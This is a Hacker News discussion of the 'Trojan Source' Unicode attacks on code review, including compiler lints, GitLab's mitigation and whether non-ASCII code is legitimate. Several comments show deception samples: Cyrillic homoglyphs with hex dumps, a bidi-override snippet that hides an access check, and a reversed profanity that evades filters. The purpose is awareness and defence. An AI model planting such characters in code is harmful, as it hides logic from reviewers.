               | steveklabnik wrote:
               | > But it's their example
               | 
               | It's the example that the researchers provided to us, to
               | be clear about it.
        
               | hug wrote:
               | I think that it is possible that you are missing a fairly
               | important point.
               | 
               | ... And that point is that none of the vowels in my
               | previous sentence are latin, I guess.
        
               | mkl wrote:
               | I think you missed some. I can't seem to paste your fake
               | "i"s back in, but here's what I see:                 $
               | xxd       I think that it is possible that you are
               | missing a fairly important point.       00000000: 4920
               | 7468 d196 6e6b 2074 68d0 b074 20d1  I th..nk th..t .
               | 00000010: 9674 20d1 9673 2070 6f73 73d1 9662 6cd0  .t ..s
               | poss..bl.       00000020: b520 7468 d0b0 7420 796f 7520
               | d0b0 7265  . th..t you ..re       00000030: 206d 6973
               | 7369 6e67 20d0 b020 66d0 b0d1   missing .. f...
               | 00000040: 9672 6c79 2069 6d70 6f72 7461 6e74 2070  .rly
               | important p       00000050: 6f69 6e74 2e0a
               | oint..
        
               | hug wrote:
               | Made you look. :)
               | 
               | I also skipped a bunch of the "I"s.
        
               | mkl wrote:
               | Yes. What browser did you use to make the comment? I
               | can't get all those characters to paste in.
        
               | hug wrote:
               | Firefox 93.0 on Windows 11. Characters copied & pasted
               | from charmap.exe
               | 
               | a: U+0430 "Cyrillic small letter a"
               | 
               | e: U+0435 "Cyrillic small letter e"
               | 
               | i: U+0456 "Cyrillic small letter Byelorussian-Ukranian i"
        
             | est31 wrote:
             | > warning: identifier pair considered confusable
             | 
             | Note that the lint you mention is about _identifiers_ ,
             | while "user" is a literal. The lint does not fire for
             | literals. String literals have always supported non ascii
             | characters since 1.0.0, and there has never been a lint for
             | them, until now with the 1.56.1 release.
        
               | estebank wrote:
               | Also worth noting that the homoglyph attack _isn 't_
               | linted for in literals or comments, only the bidi
               | codepoints are.
        
           | _3u10 wrote:
           | This stuff has always been there consider this code:
           | 
           | if (uid = NULL) { // Check if root
           | 
           | And if you're using clang: if ((uid = NULL)) { // Check if
           | root
           | 
           | I'd venture that this is far more dangerous than unicode in
           | strings...
           | 
           | or how about:
           | 
           | strcpy()
           | 
           | or #include anything with a #DEFINE
        
             | [deleted]
        
             | fstrthnscnd wrote:
             | > if (uid = NULL) { // Check if root
             | 
             | That's not the same class of error, since here a programmer
             | can _see_ the issue by simple inspection.
             | 
             | > or #include anything with a #DEFINE
             | 
             | This one perhaps is closer to the mark, although not based
             | on unicode.
        
               | _3u10 wrote:
               | To me it's the same class of error which is convincing
               | humans and other automated tests that your code is OK
               | when it isn't.
               | 
               | I dealt with a bug that only appeared in release builds,
               | and never in debug. The offending code looked roughly
               | like this:                 if (blah)         #ifdef DEBUG
               | baz();         #endif       bar();
               | 
               | The systemic problem was it was a project created by
               | interns, and they'd review each others code. By the time
               | the bug got to me the interns had left and a Sr Dev had
               | spent a day looking for the bug. It took me an hour to
               | find it. In isolation its easy to see but in the mess of
               | all the other code, you really have to look for these
               | things.
        
             | capitainenemo wrote:
             | Rust doesn't allow assignment in conditionals.
             | 
             | https://locka99.gitbooks.io/a-guide-to-porting-c-to-
             | rust/con...
        
               | _3u10 wrote:
               | It does, in fact the article you posted, shows you
               | exactly when rust allows assignment in conditionals.
               | 
               | As long as you're initializing a variable, it's allowed,
               | if you're not initializing you'll have to use a block
               | expression.
        
               | capitainenemo wrote:
               | Should have just used this sentence - which also directly
               | covers parent's case.
               | 
               | "Rust does not allow assignment within simple expressions
               | so they will fail to compile. This is done to prevent
               | subtle errors with = being used instead of ==."
               | 
               | Better?
        
           | ace112 wrote:
           | Ooh, or you could just put in the cyrillic 'a' and even have
           | it look like it's legit :)
        
       | smsm42 wrote:
       | > Cambridge research clearly shows that most compilers can be
       | tricked with Unicode into processing code in a different way than
       | a reader would expect it to be processed.
       | 
       | Unless I misunderstand the premise, this in not right. The
       | compiler is not "tricked" into doing anything different - it
       | interprets the code the same way as it always did. It's like
       | saying "rm" command "can be tricked into" deleting important
       | files. The rm tool doesn't know which files are important to you,
       | and the compiler doesn't - and shouldn't - know what you consider
       | to be "correct" code. It would correctly compile any code that is
       | syntactically correct - if there are strings inside that look
       | weird to you, it doesn't matter to the compiler.
       | 
       | The entity that can be "tricked" here is the reviewer of the code
       | - who, indeed, might probably be tricked into accepting code that
       | does something different than they'd think it does (though it'd
       | require a very clever attacker to for the code to both do
       | something nefarious with Unicode and still look innocent and not
       | weird to the reviewer). Fortunately, this is quite easy to fix -
       | just don't accept any patches with source code that have any non-
       | ASCII outside small set of localization resources (proper code
       | would have localizable resources outside the code anyway, tbh)
       | and no Unicode would ever trick you.
        
         | __alexs wrote:
         | > Fortunately, this is quite easy to fix - just don't accept
         | any patches with source code that have any non-ASCII outside
         | small set of localization resources
         | 
         | There are plenty of projects out there written by people who
         | aren't English speakers who depend on the Unicode capabilities
         | of languages to write code that is actually readable to them.
         | Turning that off is far from a solution.
        
           | smsm42 wrote:
           | Can you give an example? I've never seen a project (outside
           | domains on APL, etc.) that seriously relied on any Unicode
           | capabilities in the code itself (again, I am not talking
           | about localized strings). My native language is not English,
           | I've worked with people all over Europe, China, India, Japan,
           | Israel, etc. - there are a lot of exciting i18n/l10n problems
           | but I have never seen much of what a compiler would need to
           | be concerned with.
        
           | ivanhoe wrote:
           | Does anyone actually do that in a production code?
           | 
           | I myself am not native English speaker and use unicode when
           | writing in my mother tongue, but in 20+ years of programming
           | I've never seen anyone using non-ascii chars in their
           | professionally written code? Of course, you use the language
           | in localization files, and perhaps in comments occasionally -
           | especially in TODO stuff that's not meant to be permanent -
           | but not in the actual code, like e.g. for a variable or
           | function names.
           | 
           | I'd actually consider it a bad idea, as it limits
           | significantly who can manage that code in the future.
        
             | fstrthnscnd wrote:
             | > Does anyone actually do that in a production code?
             | 
             | Would you accept teaching code as production code?
             | Specifically, if you were to teach programming to young non
             | English speakers, wouldn't you accept them to use words of
             | their native tongue for variables and such?
             | 
             | > I'd actually consider it a bad idea, as it limits
             | significantly who can manage that code in the future.
             | 
             | Wouldn't you say that solely using roman letters in code
             | would impose a similar limit? In countries where these
             | letters are seldom used (like for instance greek letters in
             | western countries), only those accustomed to them would be
             | able to handle code (as it has been the case until the last
             | decade perhaps).
        
             | Cthulhu_ wrote:
             | It's a very western / Anglosphere attitude, and I think you
             | underestimate how much code is produced in e.g. China and
             | Japan nowadays, with comments in their native language.
             | 
             | How would you name a FooBarWicket if you don't speak a word
             | of English?
             | 
             | I mean don't get me wrong, ideally everybody writes code in
             | perfect English and sticks to a set of ~50 ascii
             | characters, but it's not an ideal world and you have to
             | keep other languages and cultures in mind.
        
               | Aeolun wrote:
               | > How would you name a FooBarWicket if you don't speak a
               | word of English?
               | 
               | How would you learn how to make a FooBarWicket without
               | knowing a word of English? Any programming languages
               | control constructs are almost by definition English.
        
               | ivanhoe wrote:
               | Well, what you call an Anglosphere attitude is a reality
               | of learning in a majority of non-english speaking
               | countries: There's simply not enough resources for
               | learning in your own language.
               | 
               | China is huge so I can see how it could work for them,
               | but I still have to admit it's very hard for me to
               | imagine someone becoming say a competent web dev without
               | picking at least some basic English along the way, so
               | they can handle at least the documentation and stay in a
               | loop on new tech coming out all the time. It's not
               | anything new as a concept, nor I see it as damaging for
               | local cultures in any way - back in my University days
               | I've learned myself some Russian so that I could read
               | their physics and chemistry books which were excellent
               | and way cheaper and easier for me to get than those from
               | the West. One day I'll have no problem learning some
               | Chinese if (or more likely when?) they become the
               | referent source of knowledge.
        
               | __alexs wrote:
               | > China is huge so I can see how it could work for them,
               | but I still have to admit it's very hard for me to
               | imagine someone becoming say a competent web dev without
               | picking at least some basic English along the way,
               | 
               | Having worked with some large software teams in China my
               | experience was that most people could speak a bit of
               | English (but generally didn't want to) and were nowhere
               | near at the level needed to actually design and write
               | software in English.
               | 
               | If we forced them to do everything in English quality was
               | terrible and everything took ages, but it we let them
               | write in Mandarin things were much better.
        
               | notJim wrote:
               | > it's very hard for me to imagine someone becoming say a
               | competent web dev without picking at least some basic
               | English along the way, so they can handle at least the
               | documentation and stay in a loop on new tech coming out
               | all the time.
               | 
               | Why would they need to learn English to do those things?
               | I'm sure there are Chinese-language tech news sites, and
               | Chinese-language documentation.
        
               | jrochkind1 wrote:
               | Agreed, but I'm still curious (and don't know the answer)
               | how often someone actually needs to put a "Bidi override"
               | in a comment... if I were a language designer I'd be
               | tempted to just say they aren't allowed in comments or
               | identifiers or anywhere but string literals/data, and
               | have the compiler/interpreter just reject it.
               | 
               | (I have used a bidi override before myself, for non-
               | malicious purposes!)
        
               | amenod wrote:
               | I would argue that even if you decide that you are using
               | some other language and not English, there is only a
               | well-defined subset of Unicode characters that should
               | ever be allowed in the codebase. Bidi override control
               | characters are clearly not among them, whichever language
               | you choose.
        
               | chmod775 wrote:
               | > there is _only_ a well-defined subset of Unicode
               | characters that should _ever_ be allowed in the codebase
               | 
               | It's not even remotely well-defined, and probably never
               | will be. Also, as long as we keep adding to unicode, you
               | will need to keep your whitelist of code points updated.
               | 
               | You can however find _a_ well-defined subset of
               | characters that can be allowed.
               | 
               | In either case you'd be essentially excluding entire
               | languages.
        
               | amenod wrote:
               | You misunderstood my point:
               | 
               | >> There is only ... that _should_ ever be allowed...
               | 
               | What I am saying is someone decides to code in a non-
               | english language (which is completely reasonable) they
               | _should_ define a subset of unicode characters that is
               | acceptable. Additionally, the allowed characters should
               | not permit tricks like these.
               | 
               | As for excluding entire languages... well, yes. This is
               | already the case today. But OTOH it's not like
               | understanding what "if" means gives you any special
               | advantage in programming.
        
               | rbanffy wrote:
               | > Bidi override control characters are clearly not among
               | them, whichever language you choose.
               | 
               | Not sure how would you write a comment in an RTL human
               | language in the middle of LTR code without it. Lots of
               | people write learn RTL languages well before writing any
               | code.
               | 
               | What compilers can do is to process those characters and
               | assign them semantic value that makes the code equivalent
               | to what is expected to be rendered.
               | 
               | Now, bidi overrides in identifier names is a nightmare
               | I'd prefer to avoid.
        
               | amenod wrote:
               | The same way as you write a comment in a LTR human
               | language in the middle of RTL code - you don't. You stick
               | to either LTR or RTL. This is code, not prose.
        
               | WalterBright wrote:
               | > Not sure how would you write a comment in an RTL human
               | language
               | 
               | Siht ekil.
        
               | jrochkind1 wrote:
               | You do not actually need the bidi override control
               | character to put a comment in an RTL language in the
               | middle of LTR code.
               | 
               | You only need it if you are doing this, and the default
               | Unicode algorithm for guessing LTR/RTL boundaries gets it
               | wrong, so you need to override with an explicit bidi
               | override control. I'm not even sure how feasible that is
               | to do in current editor/IDE environments developers who
               | have this use case might use.
               | 
               | I am genuinely curious how often these sorts of
               | situations come up in actual development.
               | 
               | > What compilers can do is to process those characters
               | and assign them semantic value that makes the code
               | equivalent to what is expected to be rendered.
               | 
               | I don't understand what you mean or how that's even
               | possible, for the kinds of attacks discussed in OP.
        
               | jrochkind1 wrote:
               | Btw here's proof. Here is ltr text and rtl `ibriyt text
               | `rby interspersed with no bidi override control
               | characters to be found.
               | 
               | Unicode can handle this, it has a heuristic algorithm for
               | it. Note how if you try to select the text character-by-
               | character, your selection does funny things at the rtl to
               | ltr boundaries, because the byte order doesn't match the
               | order on the screen. It really is handling the
               | directionality changes, with the letters entered in
               | "order" across changes, there is no funny entry or
               | ordering going on, this is plain old normal unicode
               | handling interspersed directionality changes just fine,
               | with no bidi overrides.
               | 
               | It just sometimes gets it wrong for the intent of the
               | author. Especially when there are characters at the
               | boundaries that are themselves not strongly associated as
               | rtl or ltr (like ordinary "western arabic numerals" or
               | punctuation). That's what the bidi override control char
               | is for.
        
               | dmz73 wrote:
               | When you code for yourself, write what you want. If you
               | write to collaborate then use English/ASCII. Imagine
               | international aviation if they allowed the same BS that
               | people in IT allow and now even try to promote - everyone
               | talking their own language and not understanding each
               | other - we would have planes colliding and crashing all
               | over the place.
        
               | Aeolun wrote:
               | We used to have that, with exactly the result you
               | describe. Which is why it was changed.
               | 
               | We'll get there eventually with software, but it
               | generally doesn't kill people so there's less incentive.
        
               | wizzwizz4 wrote:
               | Aviation requires real-time communication; it's not a
               | great analogy, I don't think.
        
               | worrycue wrote:
               | I still wonder though, just how much production non-
               | comment source code is not written in the ASCII character
               | set.
               | 
               | The libraries of most programming languages (developed in
               | the west) are in ASCII - frameworks and middleware too.
               | Have people in countries like Japan and China actually
               | translated all of that code - renaming functions,
               | classes, and variable names to their native tongue in
               | Unicode - or do they just learn the English names (they
               | are all nouns/pronouns and at most simple phrases so
               | translation should not be too difficult; they don't have
               | to understand English grammar).
        
               | Moru wrote:
               | Microsoft translated all the commands in the scripting
               | language for excell to native language, making it totally
               | impossible to use for anyone. You can't even google it
               | because the help is so split up in different languages.
        
               | Zababa wrote:
               | Not only the commands, the separator too. In some
               | languages, it's FUNCTION(arg1, arg2), in some others it's
               | FONCTION(arg1; arg2)
        
             | Bayart wrote:
             | I've definitely seen it done, in both code I was adjacent
             | to and code I was pulling from outside. I have vivid
             | memories of stumbling on a lib doing seemingly what I
             | needed but with all comments in Chinese and variables/funcs
             | in Pinyin.
        
             | Piskvorrr wrote:
             | I can attest that it happens, even in (natural) languages
             | that use Latin scripts. Sure, "just use en.US-ASCII" is a
             | mitigation, and most (Euroamerican) code follows this; the
             | bug extends to string literals however ("they don't end
             | where you see them // this is actually not part of the
             | string; return;"), so a different approach is needed.
        
             | Const-me wrote:
             | Professionally made GUI software needs Unicode even when
             | English localized, for typography.
             | 
             | Proper quotes, proper dashes (ASCII doesn't have a dash
             | character, it only has minus), non-breakable space, soft
             | hyphen, EUR character, Greek letters like p and m, etc.
        
               | jdavis703 wrote:
               | Most of these should be in a separate file for i18n, not
               | directly in the source code.
        
               | Const-me wrote:
               | Internationalization is not limited to putting strings
               | into a table in resource. It also needs non-trivial
               | amount of code. Printing numbers into strings is code not
               | data. Yet if you want the numbers to look good, like "600
               | mm" or "6x10-4 meters", you gonna have Unicode in code,
               | not the resources.
               | 
               | Another thing, not every software needs i18n. Depends on
               | the market. I'm yet to see a C++ compiler which would
               | localize their output messages.
        
               | jdavis703 wrote:
               | "Meters" is an English word, and a string like "600 mm"
               | should still probably be extracted from the code as "%d
               | mm."
        
               | Const-me wrote:
               | Still, there're also string like "6*10-4"
        
               | kzrdude wrote:
               | GCC supports localization, that's one C++ compiler.
               | 
               | Intel C++ compiler seems to have a Japanese version (not
               | tried).
        
         | [deleted]
        
         | klohto wrote:
         | You argument away your own fix. Proposed fix is like if rm was
         | limited to files outside of /sys, plenty of projects depend on
         | the standardized behavior.
        
         | Sebb767 wrote:
         | > The rm tool doesn't know which files are important to you,
         | and the compiler doesn't - and shouldn't - know what you
         | consider to be "correct" code.
         | 
         | This is actually no longer true. Many rm implementations today
         | prevent you from deleting a path including the root directory,
         | unless you explicitly specify `--no-preserve-root`. Similarly,
         | a lot of compilers tend to warn you or outright stop if they
         | detect code that is very likely to be buggy - the rust compiler
         | warning about these control characters is just the latest
         | example.
         | 
         | Of course, in theory, each tool should do its job and the user
         | should be the boundary to know whats right. In practice,
         | though, these heuristics tend to catch bugs-to-be 95% of the
         | time (at least in my experience) and are easily disabled
         | otherwise, so they are good to have.
        
           | wizzwizz4 wrote:
           | I couldn't care less about my root directory. The only things
           | I care about are the motherboard firmware and the /home
           | directory, and nothing prevents `rm` from deleting those.
           | 
           | The `--one-file-system` or `--preserve-root=all` flags are
           | more useful than `--preserve-root`, but they're not defaults.
           | (For a good reason: compatibility.)
        
         | robin_reala wrote:
         | APL developers would disagree.
        
       | edent wrote:
       | BDI can be used to evade profanity filters. Writing something
       | like `‮kcuf` will display a banned word.
       | 
       | Does it work here?
       | 
       | > I am an toidi
       | 
       | No? HN strips the BDI.
       | 
       | But there are plenty of other systems which display weird RTL
       | behavior.
        
         | lokedhs wrote:
         | Yes, Mastodon has recently been discussing this.
         | https://github.com/mastodon/mastodon/issues/2777
        
       | im3w1l wrote:
       | I remember bringing this up many years ago. Yes specifically
       | making code seem like comments using bidi. I'm just a little bit
       | salty I won't get the credit.
       | 
       | https://bugs.eclipse.org/bugs/show_bug.cgi?id=339146
        
       | ComodoHacker wrote:
       | The paper: https://www.trojansource.codes/trojan-source.pdf
        
       | robotmay wrote:
       | This was a pretty interesting thing to mitigate - we added some
       | support around it to GitLab after it was reported to us, which
       | shipped in the latest security release:
       | https://gitlab.com/gitlab-org/gitlab/-/commit/3fb44197195b57...
       | (you can actually see it in effect on that commit's examples,
       | which is quite meta). These characters have valid use-cases in
       | right-to-left languages like Arabic, Japanese etc, so it had to
       | be configurable for project-owners if they have legitimate use-
       | cases for it. Our focus was on making sure that repository
       | maintainers could see these characters in code reviews.
       | 
       | The homoglyph attack is interesting but it really should be
       | noticed as part of a code review process, as it requires adding
       | the imitation function calls at some point too. It'd also likely
       | be pretty frustrating to end users if we were to highlight every
       | single unicode character that looks like the latin alphabet.
       | 
       | It's certainly a good lesson in not copy/pasting random snippets
       | from the internet and pasting them into a root shell, however :D
       | (we do always highlight the bidi characters on GitLab snippets,
       | though)
       | 
       | Aside: this was a royal pain in the arse to figure out if I had
       | live examples in the specs, because vim also just rendered them
       | "correctly". I ended up checking the files in Windows Notepad on
       | another machine to sanity check them.
       | 
       | Thanks to the authors for responsible disclosure.
        
         | charcircuit wrote:
         | >These characters have valid use-cases in right-to-left
         | languages like Arabic, Japanese etc,
         | 
         | I've never seen it used for Japanese. I don't think there is a
         | valid use case for Japanese.
        
           | robotmay wrote:
           | Ah yes you're right - looks like that can be handled with
           | CSS: https://www.w3.org/International/articles/vertical-
           | text/. Although from what I've seen most Japanese websites
           | tend to be left-to-right instead anyway.
           | 
           | Hebrew would be a more valid second example I think. I'd be
           | curious to know how many languages maintain their RTL
           | preference online.
        
             | dhosek wrote:
             | Japanese1 isn't a right to left language, exactly. It can
             | be written horizontally, in which case it's L-R, top to
             | bottom, or, vertically, in which case it's top to bottom,
             | with columns running R-L, but functionally, this is still
             | like L-R typesetting, just with the characters rotated
             | 90deg CCW and the pages are then read in the same order as
             | pages in a R-L book. This is typical of manga which is why
             | there might have been confusion by the OP about the
             | directionality of Japanese.
             | 
             | [?][?][?]
             | 
             | 1. All of this also applies to Chinese and Korean.
             | Interestingly, traditional Mongolian script is also written
             | vertically, but in columns left to right rather than right
             | to left.
        
         | capitainenemo wrote:
         | This doesn't feel particularly new either? Isn't it pretty much
         | a new variant of https://github.com/reinderien/mimic ?
         | 
         | Which, if one is suspicious of code, can be defeated in vim
         | with: set encoding=latin1
        
         | specialist wrote:
         | > _It 's certainly a good lesson in not copy/pasting random
         | snippets from the internet..._
         | 
         | For someone with more gumption than me:
         | 
         | Future copy & paste will default have intermediate screenshot
         | and OCR steps. Voila: charset scrubbing for free.
         | 
         | Why not? Already today misc UIs and renderings disallow text
         | selection. Drives me nuts.
        
           | kevin_thibedeau wrote:
           | This is too complicated for a personal supercomputer to be
           | burdened with. Better to ship everything on the clipboard to
           | a sanitizer service.
        
           | modeless wrote:
           | The future is now. Android has been doing this for years and
           | it's awesome. There's no text you can't copy.
           | 
           | To clarify, by default copy and paste works the normal way,
           | but you can open the app switcher to use the OCR copy/paste
           | which works on non-selectable text too, even in images.
        
             | QuercusMax wrote:
             | There's a way to prevent this - to my great annoyance,
             | health apps (such as the ubiquitous MyHealth variants) and
             | banking apps can prevent you from taking screenshots or
             | copying text. This is presumably to prevent screen-scraping
             | apps from stealing your private data, but it's really
             | annoying when you're trying to screenshot a QR code for
             | some kind of check-in process.
        
               | checkyoursudo wrote:
               | That's why you need a second phone to photograph the
               | screen of the first phone.
        
         | lelandbatey wrote:
         | I was impatient to find the example you were talking about; as
         | far as I can tell, this is the line with the example:
         | https://gitlab.com/gitlab-org/gitlab/-/commit/3fb44197195b57...
         | 
         | And here's what it looks like in various conditions/viewers:
         | 
         | With the fix, this is how it looks in the browser in the Gitlab
         | interface:                   if (accessLevel != "user") { //
         | Check if admin
         | 
         | Without the fix, viewed raw (and thus viewed in a vulnerable
         | way), it looks like this:                   if (accessLevel !=
         | "user") { // Check if admin
         | 
         | And in a hex viewer, it looks like this:
         | 000005b0: 2020 2020 2020 2069 6620 2861 6363 6573         if
         | (acces         000005c0: 734c 6576 656c 2021 3d20 2275 7365
         | 72e2  sLevel != "user.         000005d0: 80ae 20e2 81a6 2f2f
         | 2043 6865 636b 2069  .. ...// Check i         000005e0: 6620
         | 6164 6d69 6ee2 81a9 20e2 81a6 2229  f admin... ...")
         | 000005f0: 207b 0a20 2020 2020 2020 2020 2020 2020   {.
         | 00000600: 2063 6f6e 736f 6c65 2e6c 6f67 2822 596f
         | console.log("Yo         00000610: 7520 6172 6520 616e 2061 646d
         | 696e 2e22  u are an admin."
        
           | Antwnis wrote:
           | That's a great example ^ that demonstrates exactly how this
           | vulnerability can be easily abused
        
         | smashed wrote:
         | I was intrigued by your meta example and I took a look. It took
         | me 3-4 minutes to find the warning, and I was looking for it!
         | 
         | I was expecting a big fat warning on the merge request itself,
         | or maybe on the lines containing the dangerous chars.
         | 
         | In the end, it is a small ? character inserted were the unicode
         | control chars are, and a mouseover tooltip warning about a
         | potential issue.
         | 
         | The warning is good, but why so subtle? Sorry for the
         | criticism. The feature is still a huge positive.
        
           | robotmay wrote:
           | Thanks for the feedback! Our primary use-case when deciding
           | on it was to flag these up in a code-review situation, to
           | prevent malicious content being submitted in merge requests
           | to unsuspecting projects. We found this made it stand out
           | enough to the reviewer when performing code reviews. I also
           | try to not be too quick to add new alerts or sections to the
           | GUI as we sometimes get criticised for having too much
           | clutter D:
           | 
           | GitHub by comparison went down the alert banner route, from
           | what I can see. I'm not opposed to adding something to that
           | effect as well though - especially for inexperienced
           | reviewers, it would be nice to include some more information
           | about the potential exploit. That could be something we
           | revisit when we add the homoglyph highlighting.
        
         | slim wrote:
         | this was a royal pain in the arse to figure out if I had live
         | examples in the specs, because vim also just rendered them
         | "correctly"
         | 
         | That's because vim supports Farsi/Arabic natively from day one.
         | Even if the OS does not support it, you can still write
         | bidirectional and right-to-left text in vim. Never knew the
         | reason, but thanks Bram Molenaar.
        
         | stackbutterflow wrote:
         | > It's certainly a good lesson in not copy/pasting random
         | snippets from the internet and pasting them into a root shell,
         | however
         | 
         | I gotta say that I always make sure that I understand each
         | piece of code that I copy paste but I do copy paste and never
         | thought of this type of attack. Maybe that's something I should
         | pay attention to in the future.
        
           | captaincrunch wrote:
           | from the article, its likely you'd not even notice - unless
           | you pasted in an ascii only editor that doesn't allow
           | anything other than plain old text.
        
         | acdha wrote:
         | > It'd also likely be pretty frustrating to end users if we
         | were to highlight every single unicode character that looks
         | like the latin alphabet.
         | 
         | Have you tried something similar to what the browsers do where
         | highlighting is only enabled when there are multiple scripts
         | mixed within the same token? Source code seems like it would be
         | harder since you have many tokens rather than just a single one
         | as in a hostname, and I'd be curious how much legitimate usage
         | mixes scripts for technical reasons because you have something
         | like a language or framework convention that certain names
         | start with a particular English-derived term.
        
           | robotmay wrote:
           | So far we're just detecting individual bidi characters, but
           | looking at characters in their greater context could be quite
           | interesting. This would seem like quite a good use-case for
           | machine-learning too, if you wanted to get super into it.
        
         | jhgb wrote:
         | > It'd also likely be pretty frustrating to end users if we
         | were to highlight every single unicode character that looks
         | like the latin alphabet.
         | 
         | That actually strikes me as very desirable. (Especially in
         | light of the old maxim that "programs must be written for
         | people to read, and only incidentally for machines to
         | execute".)
        
           | grishka wrote:
           | Latin C and Cyrillic S aren't the same letter. The latter is
           | actually an "s". It would be a pain in the ass to work with
           | strings if those Cyrillic letters that look like their Latin
           | counterparts reused their codepoints. Imagine having to
           | convert "M" to lowercase. Would that return "m" or "m"? Same
           | for "H", "h" or "n"?
           | 
           | And, actually, there was some really really cursed Soviet
           | encoding that did this to save bits. The Russian railway
           | company still uses it[1] to this day.
           | 
           | [1] https://habr.com/ru/post/547820/
        
             | gambas99 wrote:
             | > there was some really really cursed Soviet encoding
             | 
             | I know at least 10 stories that start like this
        
             | jhgb wrote:
             | > Latin C and Cyrillic S aren't the same letter.
             | 
             | Well, as a moderately old Czech, I'm somewhat familiar with
             | Cyrillic. They kind of used to force it on us in schools.
        
           | wizzwizz4 wrote:
           | Those Unicode characters aren't just there for show. They're
           | part of real scripts that real people use; it would be
           | annoying for people using those scripts.
        
             | jhgb wrote:
             | I'm fairly sure this could be arranged for. As in, if
             | there's too many of them belonging to the character set of
             | a particular language, then it's very likely that it's
             | simply a text in that language. But random characters in
             | the middle of ASCII identifiers are _probably_ not
             | something that you want.
        
               | robotmay wrote:
               | Yeah I'm not opposed to adding highlighting to them, and
               | we are investigating how to do it, but it was less clear-
               | cut than the bidi characters (which are totally invisible
               | when rendered). I think we'll want to make it a bit more
               | configurable and probably a separate option to the one
               | which highlights the bidi characters.
        
             | R0b0t1 wrote:
             | This type of attack isn't new. I can't recall the names but
             | there are afair multiple C/C++ coding standards that limit
             | everything to ASCII to avoid precisely this attack, but
             | also others with visually similar but nonequivalent names.
        
             | pas wrote:
             | Yes, and they should be in well annotated/marked
             | string/data sections, not in logic code.
        
             | JoshTriplett wrote:
             | Exactly. When we were adding support for non-ASCII
             | identifiers to Rust, and thinking about homoglyphs and
             | confusable characters, we needed to evaluate the tradeoffs
             | between catching such characters and inconveniencing the
             | speakers of various languages who want to write Rust in
             | their language.
        
       | Pxtl wrote:
       | I skimmed the article but I didn't see any examples of this being
       | exploited... Has anybody done a proof of concept on how Bidi can
       | be used? I'm having trouble thinking of a line of code with a
       | comment or literal where the code is legit forwards but malicious
       | backwards.
        
       | akersten wrote:
       | It is wrong to call this a bug, this is a _feature_ of Unicode
       | and very intentional. Whether we should have thought about that
       | when allowing parsers to digest anything outside of ASCII is the
       | real question. The answer is probably  "IDEs and compilers should
       | ignore character-direction codes when looking at source files."
       | But that doesn't solve homoglyph attacks (and other undiscovered
       | deception). What a fun can of worms. Who gets to solve it?
        
         | zeepzeep wrote:
         | > "IDEs and compilers should ignore character-direction codes
         | when looking at source files."
         | 
         | No I think some people would disagree, arabic coders for
         | example. People just need to be aware of this when using
         | unicode in their product.
        
           | samus wrote:
           | Editors and code views should definitely show when BiDi and
           | other interesting Unicode features are used, just like they
           | already do with spaces and zero-width whitespaces. These
           | features should definitely work, but they are a liability if
           | they can also used to mislead human users.
           | 
           | Compiler maintainers need to update the syntax rules to
           | restrict free mixing of unicode characters. Similar
           | restrictions were already adopted in domain names.
        
         | kingcharles wrote:
         | You're right - their headline is written for attention. It's an
         | exploit of a feature.
         | 
         | What I'm interested to know is whether there is any code
         | already out there in the wild with this exploit in it? An
         | intelligence service could have exploited this years ago
         | without anyone noticing until now.
         | 
         | Unicode is a pathway to all manner of hijinks, including as you
         | say, homoglyph attacks. For instance, on some TLDs I can easily
         | create two different domain names that render identically in
         | the browser.
        
           | comex wrote:
           | > What I'm interested to know is whether there is any code
           | already out there in the wild with this exploit in it?
           | 
           | It's possible, but I doubt it. The paper mentions that Vim
           | isn't vulnerable to the bidirectional attack. Not mentioned
           | in the paper: neither is `less`, the pager, which is used by
           | default for `git diff` and other Git commands. Nor are either
           | of the first two terminals I tried, when `cat`ing the file
           | without a pager.
           | 
           | All of the aforementioned programs display the direction
           | markers as either escape sequences highlighted in bright
           | colors, or garbage characters, both of which stand out
           | visually like a sore thumb. Now, that's more a sign of poor
           | Unicode support in those programs than it is anything to
           | their credit. But it does mean that this kind of attack is
           | incredibly brittle, at least in any codebase where some
           | people working on it are likely to be using Unix tools.
           | There's a high chance the aberrant characters will be spotted
           | at some point or other.
           | 
           | And once spotted, it's self-evident that it's an attack. I
           | suspect real attacks would try to be more subtle, introducing
           | bugs that could pass as genuine mistakes, at least at first
           | glance.
        
             | kingcharles wrote:
             | It's sad that largescale exploitation of this is stopped
             | only because many applications still have really poor
             | Unicode support and would therefore make the changes human-
             | visible.
        
               | Groxx wrote:
               | Coding editors also often show this kind of thing
               | intentionally, as those characters are meaningful for
               | interpretation purposes. Many of them are very UTF
               | friendly, but they still show zero-width spaces as e.g.
               | "<zwsp>" _on purpose_.
               | 
               | They've also often shown non-printable ASCII control
               | characters for basically forever. Null bytes and \bel and
               | whatnot are very important despite being "invisible", and
               | they've been around for decades.
        
               | tetha wrote:
               | I've been bitten by things like this from an entirely
               | unexpected angle - messengers like teams and skype
               | sometimes <helpfully> replace characters like "-" and " "
               | with all manner of more readable unicode characters. More
               | readable, until the YAML parser choked.
               | 
               | Since that, I pretty much always run some variant of the
               | gremlins plugin, which highlights pretty much all unicode
               | spaces, dashes and other weird control symbols.
        
               | Groxx wrote:
               | Chat apps replacing (tm) with a horrifically large,
               | poorly-rendered and off-colored "TM" and ruining The
               | Joke(tm) is a major pet peeve of mine, yeah :| And even
               | worse, it seems to be spreading, as each one blindly
               | copies the horrible decisions of the others. I would
               | disable all of those auto-replacements everywhere _if
               | only I could disable all of those auto-replacements
               | everywhere_.
        
               | powersnail wrote:
               | I think making these chars human visible is a feature.
               | Most code editors have features like showing invisible
               | characters, displaying some representation of white space
               | characters, or highlighting control sequences.
               | 
               | Because the editor is supposed to edit plain text, which
               | means all characters must be editable. And something can
               | only be editable if they are visible.
        
             | josephcsible wrote:
             | > Now, that's more a sign of poor Unicode support in those
             | programs than it is anything to their credit.
             | 
             | But that behavior is intentional. If you want, you could do
             | "alias less='less -r'", and then it would behave the way
             | you want, and you'd become vulnerable to this attack.
        
               | comex wrote:
               | -r makes it pass all control characters to the terminal.
               | To quote less's man page:
               | 
               | > Warning: when the -r option is used, less cannot keep
               | track of the actual appearance of the screen (since this
               | depends on how the screen responds to each type of
               | control character).
               | 
               | This is not the same as actually supporting (i.e. being
               | able to keep track of the screen state for) bidirectional
               | text that may legitimately use those characters.
               | 
               | For that matter, the terminal may not support it either,
               | as I mentioned.
               | 
               | Though, today I learned there has been some effort in
               | recent years to improve bidirectional text handling in
               | terminals and terminal applications, generally:
               | 
               | https://www.reddit.com/r/linux/comments/dn8uka/bidirectio
               | nal...
        
           | bmn__ wrote:
           | > I can easily create two different domain names that render
           | identically in the browser
